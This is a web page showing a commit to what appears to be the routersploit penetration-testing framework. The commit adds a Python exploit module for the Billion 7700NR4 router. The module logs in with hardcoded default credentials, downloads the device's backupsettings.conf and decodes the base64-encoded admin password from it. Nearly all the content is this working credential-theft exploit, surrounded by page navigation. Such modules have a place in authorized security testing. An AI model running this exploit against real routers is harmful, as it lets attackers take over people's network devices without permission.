Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
998d12d4
Commit
998d12d4
authored
Oct 17, 2016
by
Marcin Bury
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Exploit for Billion 7700NR4 device
parent
3231103c
Show whitespace changes
Inline
Side-by-side
Showing
2 changed files
with
84 additions
and
0 deletions
+84
-0
7700nr4_password_disclosure.py
...t/modules/exploits/billion/7700nr4_password_disclosure.py
+84
-0
__init__.py
routersploit/modules/exploits/billion/__init__.py
+0
-0
No files found.
routersploit/modules/exploits/billion/7700nr4_password_disclosure.py
0 → 100644
View file @
998d12d4
import
re
import
base64
from
routersploit
import
(
exploits
,
print_error
,
print_success
,
print_status
,
print_table
,
http_request
,
mute
,
validators
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for Billion 7700NR4 Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials for admin user."
"""
__info__
=
{
'name'
:
'Billion 7700NR4 Password Disclosure'
,
'description'
:
'Exploits Billion 7700NR4 password disclosure vulnerability that allows to '
'fetch credentials for admin account'
,
'authors'
:
[
'R-73eN'
,
# vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://www.exploit-db.com/exploits/40472/'
,
],
'devices'
:
[
'Billion 7700NR4'
,
],
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
,
validators
=
validators
.
url
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
def_user
=
exploits
.
Option
(
'user'
,
'Hardcoded username'
)
def_pass
=
exploits
.
Option
(
'user'
,
'Hardcoded password'
)
def
run
(
self
):
creds
=
[]
url
=
"{}:{}/backupsettings.conf"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
,
auth
=
(
self
.
def_user
,
self
.
def_pass
))
if
response
is
None
:
print_error
(
"Exploit failed"
)
return
res
=
re
.
findall
(
'<AdminPassword>(.+?)</AdminPassword>'
,
response
.
text
)
if
len
(
res
):
print_success
(
"Found strings: {}"
.
format
(
res
[
0
]))
try
:
print_status
(
"Trying to base64 decode"
)
password
=
base64
.
b64decode
(
res
[
0
])
except
:
print_error
(
"Exploit failed - could not decode password"
)
return
creds
.
append
((
"admin"
,
password
))
print_success
(
"Credentials found!"
)
print_table
((
"Login"
,
"Password"
),
*
creds
)
else
:
print_error
(
"Credentials could not be found"
)
@mute
def
check
(
self
):
url
=
"{}:{}/backupsettings.conf"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
,
auth
=
(
self
.
def_user
,
self
.
def_pass
))
if
response
is
None
:
return
False
# target is not vulnerable
res
=
re
.
findall
(
'<AdminPassword>(.+?)</AdminPassword>'
,
response
.
text
)
if
len
(
res
):
return
True
# target is vulnerable
return
False
# target not vulnerable
routersploit/modules/exploits/billion/__init__.py
0 → 100644
View file @
998d12d4
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment